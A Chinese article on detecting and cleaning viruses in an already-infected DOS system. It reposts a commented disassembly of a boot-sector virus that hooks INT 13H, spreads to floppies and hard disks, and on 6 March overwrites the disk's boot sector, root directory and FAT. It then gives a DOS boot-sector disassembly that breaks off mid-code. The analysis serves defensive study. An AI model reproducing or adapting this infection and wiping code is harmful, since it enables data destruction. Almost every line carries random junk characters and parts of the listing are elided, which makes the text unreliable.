近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严  峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。     r$M<vo6C  
??  Z= 	-fL  
??   一 、  带毒环境下检测清除病毒的意义     OU/3U(%n]e  
??  #~m^RoE  
??   目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300  、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。     .#sX|c=W  
??  ('uUf!h?\  
??   当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。     !.iFU+?V  
??  t]vv&vk>  
??   当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。     5i{J0/'Xu)  
??  ettBque  
??   由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本  无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。     E.N>,N  
??  L`O7-'`  
??   二 、带毒环境下检测清除病毒的原理             <WmjjD  
??  ZF#lh]   
??   对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 A=ez,87  
??   引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 3AP=  
         #@V<{/;49  
 :KRNLhWb  
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析           作者:sinister " d'Dd66  
病毒体:  p}I\H
^"8+  
JMP 01AF ;JMP到01AF  Je^;[^  
DB 00 ;病毒标计  d7&d
FvG  
DW 00F5 ;此为搬到高位址后,远程跳转指令  JX>`N5s  
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX  I3Z\]BI  
DB 02  Xa"I  
DW 0003 ;此为软盘识别标记,硬盘为0007  MR@Qn[RdM  
DW EC59 ;  
H8@z/  
DW F000 ;INT 13H的原入口  gd%Ho8,T  
.  /{[tU-}qJ  
.  !)J$f_88D  
.  l]R7A_|  
.  =kOo(  
.  p?
VDBAx  
XOR AX,AX ;清除AX  A 3q#,%  
MOV DS,AX; ;让DS=0000  J5f}-W@   
CLI ;清I标志积存器  tk 5p@l  
MOV SS,AX ;把堆栈设为0000:7C00也就是开机  l8%BRG  
MOV AX,7C00 ;后载入引导分区表的地址,目前地址  PF)s>  
MOV SP,AX ;开机时为0000:7CB6  j,i)ecZ>  
STI ;设I标志积存器  3F6A.Ny
   
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A  vy-(:aH7U  
PUSH AX ;用RETF,把程序转到引导或分区表位置  6 RSit  
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置  mb3"U"ohs  
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在  )
7@ `ut  
MOV AX,[004E] ;取INT 13H的段地址  gp?uHKsM  
MOV [7C0C],AX ;存到010C  6]N;r5n  
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13  eHZws`W  
;读写以便传播发作  LEf^cM=>  
 ,HV(l+k	{|  
MOV AX,[0413] ;取得内存K数,放在AX  )[IC?U:5I  
DEC AX ;  H;LViP2K*  
DEC AX ;减2k内存  (gU!=F?#m  
MOV [0413],AX ;存回,通常是638K  6l1jMm|=
X  
MOV CL,06 ;  %E>Aw>]v  
SHL AX,CL ;  50wulGJud  
MOV ES,AX ;算出减2K后病毒本体的位址  b3[!V{|  
MOV [7C05],AX ;AX存入0105  N!=v4f  
 }C?'BRX	  
;病毒常用手法将系统高段内存减少以便驻留  iy!=6  
;这样可以免于被其他程序覆盖  5H9z4-i	x?  
 783,s_  
MOV AX,000E ;病毒拦INT 13H  o[w:1q7  
;ISR起始的偏移量  @n	/nH?L  
MOV [004C],AX ;  &`r-.&Y  
MOV [004E],ES ;设原为病毒的INT 13H  ,^<	R{{{-A  
MOV CX,01BE ;病毒长度为1BE  ()?(I?II  
MOV SI,7C00 ;从JMP 01AF开始  FVbb2Y?R  
XOR DI,DI ;DI=0  ]Q1yNtN  
CLD ;清方向标志  5Ln,{vsv  
REPZ;  7Q9 w?y~c  
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或  b. '-?Nn  
CS: ;分区表能载入0000:7C00正常运作  RSRS wkC  
JMP FAR [7C03] ;跳到为搬过后的位址  |SSSH
  
XOR AX,AX ;清AX  +@f26O7$*  
MOV ES,AX ;ES=0000   7xlkZF  
INT 13 ;复位磁盘  8kIksy  
PUSH CS ;  ET*SB  
POP DS ;让DS=CS  {dlXLx!B  
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则  +3BN}  
MOV BX,7C00 ;读到0000:7C00  Dml;#'IF3  
MOV CX,[0008] ;硬盘第0道,第7扇区  Ic<2QknmP  
CMP CX,+07 ;比较是否从硬盘启动  ;JT-kw6l5K  
JNZ 0213 ;不是跳0213  RbnVL$c  
MOV DX,0080 ;第一硬盘C:第零面  2l'6.  
INT 13 ;用INT 13号中断,读  ;H*T^0  
JMP 023E ;跳023E比较日期,发作或正常开机  T?0eVvM  
MOV CX,[0008] ;软盘0道,第3扇区  <xm7qmqI  
MOV DX,0100 ;A:的第0面  q.bSIV|  
INT 13 ;INT 13读盘  qe#tj/aZ  
JB 023E ;失败跳023E  hi(;;C9  
PUSH CS  ;$|nrwhy  
POPES ;让ES=CS  6d}lw6L  
MOV AX,0201 ;  >tr}|>  
MOV BX,0200 ;  uGG t\.$]s  
MOV CX,0001 ;  JH9J5%sp  
MOV DX,0080 ;  K\r8g=U  
INT 13 ;读入C:的分区表到0200,以便下面比较  J/$&NWF  
JB 023E ;失败跳023E  Zu[su>\	  
XOR SI,SI ;清SI  $s:aW^k  
CLD ;清方向标志以便比较  k4;7<j$ir  
LODSW ;载入一个WORD到AX  d7upz]K9g  
CMP AX,[BX] ;比较有无病毒存在..E9AC  Wac&b  
JNZ 0287 ;没有则跳0287传染  C1)!f j=  
LODSW ;载入一个WORD到AX  n_A3#d<9  
CMP AX,[BX+02] ;再次确认..0000  x 9fip-  
JNZ 0287 ;没有跳0287  ZY+qA  
XOR CX,CX ;清CX  +r2-S~f3N  
MOV AH,04 ;  T8$y[W-c  
INT 1A ;取得日期  Y:[u1~a  
CMP DX,0306 ;是否为三月六日  Xx:"4l.w.  
JZ 024B ;是跳024B传染  W|mo5qrLS2  
RETF ;把程序交还给引导启动完成  ~f98#43  
 GD$l||8  
步骤4:病毒INT 13代码分析  (\x]YMLH  
方法:U  wmLs/:~  
PUSH DS ;首先把要用到积存器  +mn[5Y} :  
PUSH AX ;入栈保存  g($2Dk_F2  
OR DL,DL ;比较是否为软盘  ~]2K^bh8&  
JNZ 002F ;如不是则退出传染  kxv1Hn"`{E  
XOR AX,AX ;AX=0  b]KBgZ  
MOV DS,AX ;数据代段=0  5$k:t  
TEST BYTE PTR [043F],01 ;比较是否为A盘  'H;*W |:-]  
JNZ 002F ;不是则退出  $!t4r  
POP AX ;将以上保存积存器  Gd85kY@w7  
POP DS ;弹栈恢复  <LiPEo.R  
PUSHF ;压栈标志积存器  |+9&rAg  
CS: ;以便执行原INT 13  P&Vv/D  
CALL FAR [000A] ;执行原INT 13  3Y$GsN4ln  
PUSHF ;再次压栈  mC#>33{  
CALL 0036 ;以便跳转到传染程序  nTd[-3o  
POPF ;跳转到执行传染  nYF;.k  
RETF 0002 ;结束中断调用返回  tI-u@
g  
POP AX ;恢复  p~!UE/V  
POP DS ;堆栈  *>%tx k:)  
CS: ;跳转到原正常INT 13  ra[*E4P9L*  
JMP FAR [000A] ;地址执行  &|8R4l	C|  
 61"w>;d6  
;此段代码中展现了病毒常用手法,利用标志积存器做跳转  `r$c53|<u  
 mO1r~-~AJ  
步骤5:传染过程分析  JJ=%\j  
方法:U  ;xKPa6`E  
对软盘传染过程:  %l.5c Sn@  
PUSH AX ;工  BA
9c-Ay  
PUSH BX ;作  I\FBf&~  
PUSH CX ;寄  (aQNe{D#  
PUSH DX ;存  F=qG+T  
PUSH DS ;器  v.~uJ.T  
PUSH ES ;入  ET[vJnReC  
PUSH SI ;栈  )^^Eh=Kbj  
PUSH DI ;保存  $ZEwz;HNo  
PUSH CS ;以压/弹栈方式  [Jjb<6[o
  
POP DS ;使数据段DS和  *sPG,6>  
PUSH CS ;附加段ES均指向  ^	rB7&96C,  
POP ES ;代码段CS  (*CGZDg  
MOV SI,0004 ;试4次  #Xa TUT  
MOV AX,0201 ;设置各  z|5Sy.H>  
MOV BX,0200 ;积存器  TcP
(?v  
MOV CX,0001 ;为读软盘  lNQ8$b  
XOR DX,DX ;引导扇区做准备  jwe^(U  
PUSHF ;压栈标志积存器  F^mMyK  
CALL FAR [000A] ;正常的INT 13调用  `]q>A']Dl  
JNB 0063 ;成功则转判断  t;?TXAA  
XOR AX,AX ;不成功复位  5jb/[i^V  
PUSHF ;磁盘继续读  *NEA(9  
CALL FAR [000A] ;如果4次  !jIpgs5  
DEC SI ;均匀不成功  ;Ww s;.~  
JNZ 0045 ;则退出跳转  (i"@{[IP  
JMP 00A6 ;退出传染   >>nt3q  
XOR SI,SI ;SI=0以便用  L#|,_j=9  
CLD ;LODSW读入软盘  "{&?t}rj+  
LODSW ;第1或第2字进行比较  l?AWG&  
CMP AX,[BX] ;比较如果不包含病毒标志   e9	`n@  
JNZ 0071 ;则跳转写传染  n.a55uy  
LODSW ;如果已有标志  wy1xZQ<5  
CMP AX,[BX+02] ;则退出  j%V95M%$  
JZ 00A6 ;传染子程序  x<S?"  
MOV AX,0301 ;为写盘准备  DAPbFY9  
MOV DH,01 ;如果是360K  YjT7_|`(]  
MOV CL,03 ;则写到1面0道3扇区  (1|_Nr  
CMP BYTE PTR [BX+15],FD ;比较软盘  VEuT!^0Z  
JZ 0080 ;如果大于360K  Pz/bne;=  
MOV CL,0E ;写到1面0道14扇区  '|9fDzW"]  
MOV [0008],CX ;写病毒标志到软盘  <H,q( :pM  
PUSHF ;调用原INT 13  'rX!E,59  
CALL FAR [000A] ;进行传染  UZ`G S$D@  
JB 00A6  |K	H&,  
MOV SI,03BE ;以下是将正常  {} #W~1`  
MOV DI,01BE ;引导扇区从  )Ycjx~
  
MOV CX,0021 ;1BE起的21字节内容  TCC([  
CLD ;搬移到病毒程序尾部  	y7s:Buyc  
REPZ ;开始复制  Fk(+S:{yQ  
MOVSW  |BO!q9633V  
MOV AX,0301 ;写盘功能调用,写一个扇区  4}4K6y<q  
XOR BX,BX ;将病毒程序  t81}jD  
MOV CX,0001 ;写入软盘引导扇区内  exnFy-  
XOR DX,DX ;设置为软盘  #K5)Rb-H  
PUSHF  +8rGStv  
CALL FAR [000A] ;执行正常INT 13调用写盘  |fJpX5W-l  
POP DI ;将  g^V4+3v|a'  
POP SI ;工  zJ*|tw4  
POP ES ;作  rhLm2q  
POP DS ;寄  aBH!K
  
POP DX ;存  LFi 8@  
POP CX ;器  O e-FI+7  
POP BX ;退  efK|)_i
:  
POP AX ;栈  aQMUC6cPM@  
RET ;返回调用处  L;N)l2m.\  
对硬盘传染过程:  AdB  B#zd  
MOV CX,0007 ;第7扇区  x>:~=#Vi  
MOV [0008],CX ;此处为硬盘引导标记  _^K)>   
MOV AX,301 ;写功能调用  eH,r%r,  
MOV DX,0080 ;设置为硬盘  T	n.Cj5  
INT 13 ;将正常引导扇区写到0面0道7扇区内  V'?bZcRr~  
JB 13E ;失败则转  %\Dvng6$  
MOV SI,03BE ;原分区表地址  *W,tq(%tQ  
MOV DI,01BE ;目标地址  nAIV]9RAZ%  
MOV CX,0021 ;整个分区表  $I*ye+a*{q  
REPNZ  j_H"m R  
MOVSW ;开始复制  8CCd6)cG  
;此段代码是将硬盘分区信息,搬移到病毒程序尾部  ERD(	qL.J  
;这样在分析着查看硬盘分区信息时仍能看到该部分  7i^7sT8t  
;内容,以次来麻痹分析者  +g/TDwyVH  
MOV AX,0301 ;准备写病毒提进硬盘  u~SvR~OE  
XOR BX,BX ;病毒体位置  4)MKYhm  
INC CL ;第一扇区  wJ#fmQXKJ5  
INT 13 ;开始写盘传染  *nJy  
JMP 013E ;转到13E处判断是否为3月6日,是则发作  n7-|\p!xP6  
 kS_oj	  
步骤6:破坏过程分析  8T"C]  
方法:U  vEQw`OC  
主要分析对硬盘数据破坏:  L&h@`NPO	a  
.  tuH8!.  
.  #9{N[t  
.  rXl  ~D!  
.  :yg:sU  
.  me-Tv7WL  
MOV DL,80  R\DdU-k  
MOV BYTE PTR[0007],04  K
@x4>9	3n  
;准备写硬盘  {Yq"%n'0  
MOV AL,11 ;写17个扇区  ]?KTw8j}  
MOV BX,5000  Pnf|9?~$H  
MOV ES,BX ;从内存ES:5000中处开始写  2stBW5v3  
INT 13 ;残不人睹  t~_j+k0K#  
JNB 0179 ;成功转179继续写  cyYsz'i m  
XOR AH,AH  %C8p!)Hu  
INT 13 ;不成功复位磁盘继续  Y]>!uwn  
INC DH ;使写操作磁头加1继续?  a^:on?:9  
CMP DH,[0007] ;比较是否小于0007单元值  JH3$G,:zM  
JB 0150 ;是则返回开始处继续写  bogw /)1  
XOR DH,DH ;DH=0  5:S=gARz  
INC CH ;再加扇区  73/DOF  
JMP 0150 ;反回继续写  `Wc"Ix0  
;以上操作实际上是对硬盘执行4次写操作,每次17个扇区  	VycCuq&M  
;共68个扇区,这样就完全破坏了盘中的引导扇区,根目录  #fB&Hv	#s7  
;和文件分配表。  %@C(H%obWd  
 "&$ [@c  
引导扇区病毒,俺手里没有,这是一段DOS BOOT的分析。BOOT区病毒和他完成同样的工作,只不过每次  =f48[=  
读盘的时将自身写入磁盘。   d,%e?8x5  
引导过程如下:  7TDt2:;]  
1>调整堆栈位置  _:N+mEF  
2>修改并用修改后的磁盘参数表来复位磁盘系统  _LVwjZX[  
3>计算根目录表的首扇区的位置及IO.SYS的扇区位置  Tt;h?  
4>读入根目录表的首扇区  O_v8R7 {  
5>检查根目录表的开头两项是否为IO.SYS及MSDOS.SYS  g5",jTn#  
6>将IO.SYS文件开头三个扇区读入内存0000:0700H处  -4 *94<  
7>跳到0000:0700H处执行IO.SYS,引导完毕  g=ehAg  
003E FA CLI  rC !!X  
003F 33C0 XOR AX,AX  
ShP&ss  
0041 8ED0 MOV SS,AX  +,;"?j6<p  
0041 8ED0 MOV SS,AX  \,n|V3#G  
0043 BC007C MOV SP,7C00 ; 初始化堆栈  9_=0:GHk  
0046 16 PUSH SS  ON,sN  
0047 07 POP ES ;(ES)=0000H  vJ
+sdG  
0048 BB7800 MOV BX,0078 ;1EH 号中断向量的地址为0000:0078H  c	>O>|*I  
004B 36 SS: ;(SS)=0000H  f`;y
"ba  
004C C537 LDS SI,[BX] ;取1EH号中断向量的内容存入DS:SI  3t4i2]  
004E 1E PUSH DS ;该中断向量指向一个11字节的磁盘参数表  7dm:L'0  
004F 56 PUSH SI ;取到后压入堆栈中保存  >Bw<THx  
0050 16 PUSH SS  |\}&mBR  
0051 53 PUSH BX ;保存地址0000:0078H  O c,E\~  
0052 BF3E7C MOV DI,7C3E ;7C3E-7C00=003EH,即偏移003EH,以下类推  pA%}CmrMq  
0055 B90B00 MOV CX,000B ;磁盘参数表共11字节   wo#,c(  
0058 FC CLD  lmGVSdo
  
0059 F3 REPZ  |]M|IX8
o  
005A A4 MOVSB ;将磁盘参数表复制到0000:7C3EH处  Vx 
Vpl@  
005B 06 PUSH ES  P~HzNC  
005C 1F POP DS ;(DS)=0000H  #EQwl6  
005D C645FE0F MOV BYTE PTR [DI-02],0F ;修改参数表中"磁头定位时间"  Z7a~M3VnZ  
0061 8B0E187C MOV CX,[7C18] ;从BPB中取"每磁道扇区数"  "#anL8  
0065 884DF9 MOV [DI-07],CL ;修改参数表中"每磁道扇区数"  UIPi<_Xa  
0068 894702 MOV [BX+02],AX ;(AX)=0000H,修改1EH号中断向量(段址)  M	S$^m2  
006B C7073E7C MOV WORD PTR [BX],7C3E ;修改1EH号中断向量(偏移),这样1EH号  yAz`n[  
006F FB STI ;中断向量的内容为0000:7C3EH,指向新的磁盘参数表  N/IDj2C4  
0070 CD13 INT 13 ;用新的磁盘参数表来复位磁盘  ?WyL|;b*  
0072 7279 JB 00ED ;出错则转出错处理  cy T,tN  
 gmtp/?>e  
; 下面一段程序计算扇区位置  ^NwXvp>7-  
0074 33C0 XOR AX,AX  Z.TYi~d/9D  
0076 3906137C CMP [7C13],AX ;偏移0013H处是Dos分区的总扇区数  	}q7rR:g  
007A 7408 JZ 0084 ;为零表示大硬盘?  xXkP(^	Y  
007C 8B0E137C MOV CX,[7C13] ;不为0则取出来放到偏移0020H处  E:'TZ4Z  
0080 890E207C MOV [7C20],CX ;这个值本程序未用,似乎为IO.SYS准备的  QT)D|]bH  
0084 A0107C MOV AL,[7C10] ;取FAT表的个数  B'<k*9=Nv8  
0087 F726167C MUL WORD PTR [7C16] ;乘以一个FAT表所占的扇区数  GF]V$5.ps  
008B 03061C7C ADD AX,[7C1C] ;加上Dos分区前的扇区数(隐藏扇数,低位)  BSU%.tmI  
008F 13161E7C ADC DX,[7C1E] ; 高位  4B?8$&b  
0093 03060E7C ADD AX,[7C0E] ;加上Dos分区内的保留扇区数(低位)  QCjC|T9  
0097 83D200 ADC DX,+00 ; (高位)  \[u7y. b  
009A A3507C MOV [7C50],AX ;根目录表的首扇的逻辑扇区号(低位)  9HJrMX  
009D 8916527C MOV [7C52],DX ; (高位)  P|c[EUT  
00A1 A3497C MOV [7C49],AX ;此处放IO.SYS的首扇的逻辑扇区号(低位)  vw(X9xa  
00A4 89164B7C MOV [7C4B],DX ; (高位)  E$!0h_.(  
00A8 B82000 MOV AX,0020 ;根目录表中每项占32字节  -CePtq`  
00AB F726117C MUL WORD PTR [7C11] ;乘以根目录表中的项数  Fb8~2N"3  
00AF 8B1E0B7C MOV BX,[7C0B] ;取"每扇区的字节数"  y*ux7KO  
00B3 03C3 ADD AX,BX ;这两条指令是为了取整  ;QZ}$8D 6Q  
00B5 48 DEC AX  -36pkC
6
\  
00B6 F7F3 DIV BX ;除以每扇字节数,得到根目录所占扇区数  bp"@vlv  
00B8 0106497C ADD [7C49],AX ;得到根目录表后首扇的逻辑扇区号(低位)  (|Zah1k&]  
00BC 83164B7C00 ADC WORD PTR [7C4B],+00 ; (高位)  IXQxjqd^  
;下面一段程序在根目录表中找系统文件IO.SYS和MSDOS.SYS  ;.dyuKlI  
00C1 BB0005 MOV BX,0500 ;内存缓冲区的偏移值  9&]g2iT	P  
00C4 8B16527C MOV DX,[7C52] ;取根目录表的首扇的逻辑扇区号(高位)  ^xz*%2@  
00C8 A1507C MOV AX,[7C50] ; (低位)  
NW$_w  
00CB E89200 CALL 0160 ;将逻辑扇区号转换为物理扇区号  V!^5#A<  
00CE 721D JB 00ED ;出错则转出错处理  _4+'@u
#  
00D0 B001 MOV AL,01  {|:ro!&  
00D2 E8AC00 CALL 0181 ;读一个扇区到内存(根目录的首扇)  #>[BSgW  
00D5 7216 JB 00ED ;出错处理  Xx)PyO  
00D7 8BFB MOV DI,BX ;内存缓冲区的首址  $eqwn&$n  
00D9 B90B00 MOV CX,000B ;比较11个字节  v2ab  
00DC BEE67D MOV SI,7DE6 ;偏移01E6处是串"IO SYS",长11字节  ONr}{T%@/  
00DF F3 REPZ  SLGo/I*  
00E0 A6 CMPSB ;看第一项是否为IO.SYS  ]|6)'L&]*s  
00E1 750A JNZ 00ED ;不是则出错  <,:p?36  
00E3 8D7F20 LEA DI,[BX+20] ;跳过32字节就指向第二项  )7`2FLG  
00E6 B90B00 MOV CX,000B ;比较11个字节  mT:Z!sS  
00E9 F3 REPZ  #Cy9E"lP  
00EA A6 CMPSB ;看第二项是否为MSDOS.SYS  
cZVVJUF  
00EB 7418 JZ 0105 ;是则两个文件都已找到,跳过出错处理  qHQWiu%h  
 r0xmDJ@y  
;下面一段进行出错处理  |:[
[w&R  
00ED BE9E7D MOV SI,7D9E ;偏移019EH处是串"Non system disk..."  6$.I>8n  
00F0 E85F00 CALL 0152 ;显示字符串  v%|S)^c?:  
00F3 33C0 XOR AX,AX  3$TU2-x;g  
00F5 CD16 INT 16 ;等待任一键按下  +Y|1 7n  
00F7 5E POP SI  2*[Gm e  
00F8 1F POP DS ;得到1EH号中断向量的地址0000:0078H  Of@LEEh6  
00F9 8F04 POP [SI]  OQ=0>;>  
00FB 8F4402 POP [SI+02] ;恢复1EH号中断向量的内容  Ekl cnM|6  
00FE CD19 INT 19 ;自举  7k<6oM1  
0100 58 POP AX  |``rSEXYs  
0101 58 POP AX  gL/D| =  
0102 58 POP AX ;清理堆栈  XCAy _fL<B  
0103 EBE8 JMP 00ED ;再次试图起动  cEve70MV  
 G0CmY43  
;下面读入IO.SYS的头3个扇区到内存0000:0700H处  Rw^4S@~T  
0105 8B471A MOV AX,[BX+1A] ;从根目录表第一项中取IO.SYS的首簇号  -AD3Pd|Y[  
0108 48 DEC AX  }j+ZF'#  
0109 48 DEC AX ;首簇号减二  BGLJ>zkq  
010A 8A1E0D7C MOV BL,[7C0D] ;取每簇的扇区数  _;v4]MU  
010E 32FF XOR BH,BH  L:XnW1(Or  
0110 F7E3 MUL BX ;(首簇号 - 2)乘以 每簇的扇区数  4@/[aFH  
0112 0306497C ADD AX,[7C49] ;相加后得到IO.SYS的首扇的逻辑扇区号  EXS
1.3>  
0116 13164B7C ADC DX,[7C4B]  A$;U*7TJuO  
011A BB0007 MOV BX,0700 ;内存缓冲区的偏移值  SEIGs_^'\  
011D B90300 MOV CX,0003 ;循环计数初值,读3个扇区  S,n*1&ogj  
0120 50 PUSH AX ;逻辑扇区号进栈(低位)  2e/	JFhA  
0121 52 PUSH DX ; (高位)  -+Kx^V#'R  
0122 51 PUSH CX ;循环计数器进栈  _j}|R(s*+V  
0123 E83A00 CALL 0160 ;逻辑扇区号转换为物理扇区号  Zh{Pzyp  
0126 72D8 JB 0100 ;出错处理  >y(;k|-$  
0128 B001 MOV AL,01  ,wlFn  
012A E85400 CALL 0181 ;读一个扇区到内存缓冲区  9Fv1D  
012D 59 POP CX ;循环计数出栈  (05/}PhB`  
012E 5A POP DX  +a"MSPC4w  
012F 58 POP AX ;逻辑扇区号出栈  k9.@S  
0130 72BB JB 00ED ;读盘出错处理  / /3iai  
0132 050100 ADD AX,0001  ?E^~z-  
0135 83D200 ADC DX,+00 ;下一个扇区  fp.,MIS  
0138 031E0B7C ADD BX,[7C0B] ;缓冲区指针移动一个扇区的大小  Owo2DsT	t  
013C E2E2 LOOP 0120 ;循环读入三个扇区  yS@c2I602  
013E 8A2E157C MOV CH,[7C15] ;取"磁盘介质描述",传给IO.SYS  :~~}|Eu  
0142 8A16247C MOV DL,[7C24] ;取"系统文件所在的驱动器号"  A'c0zWV2  
0146 8B1E497C MOV BX,[7C49] ;取IO.SYS的首扇的逻辑扇区号  pBL,kqYNA>  
014A A14B7C MOV AX,[7C4B]  4sP0oe[h  
014D EA00007000 JMP 0070:0000 ;执行IO.SYS,引导完毕  [v^T]L  
;显示字符串的子程序  P5P:_hr  
0152 AC LODSB ;从串中取一个字符  #OqQD6  
0153 0AC0 OR AL,AL  4;<?ec(dc	  
0155 7429 JZ 0180 ;为0则已到串尾,返回(共用RET指令)  3yszfWr  
0157 B40E MOV AH,0E  9 ]c2ub7  
0159 BB0700 MOV BX,0007  $.a<b^.Xi  
015C CD10 INT 10 ;显示该字符  f<=<:+  
015E EBF2 JMP 0152 ;循环显示下一个  T4]/w|?G  
;将逻辑扇区号转换为物理扇区号的子程序  9s>q4_D  
0160 3B16187C CMP DX,[7C18] ;这两条指令是为了避免第二次除法时除数  07[A&